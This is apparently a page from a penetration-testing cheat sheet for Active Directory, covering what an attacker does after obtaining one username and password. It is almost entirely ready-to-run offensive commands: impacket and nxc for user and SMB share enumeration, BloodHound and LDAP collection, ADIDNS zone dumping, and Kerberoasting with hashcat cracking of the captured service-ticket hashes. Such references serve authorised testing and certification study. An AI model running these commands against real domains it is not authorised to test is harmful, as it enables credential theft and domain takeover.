search

Username and Password Owned

  1. Find all users

impacket-GetAdUsers -all -dc-ip $ip domain.local/username
nxc smb $ip -u 'username' -p 'password' --users
Username - no passwordchevron-right

  1. Enum SMB shares

nxc smb $ip -u 'username' -p 'password' -M spider_plus

  1. Bloodhound

bloodhound-python -d domain.local -u username -p password -gc $hostname -c all -ns $ip

  1. LDAP Enum

ldapsearch-ad.py -l $ip -d domain.local -u username -p 'password' -o output.log -t all

  1. Enumerate DNS

adidnsdump -u <domain>\\<user> -p "<password>" --print-zones <dc_ip>

  1. Kerberoasting

sudo impacket-GetUserSPNs -request -dc-ip $ip domain.local/username
sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
PreviousUsername - no passwordNextMiTM (Listen & Relay)

Last updated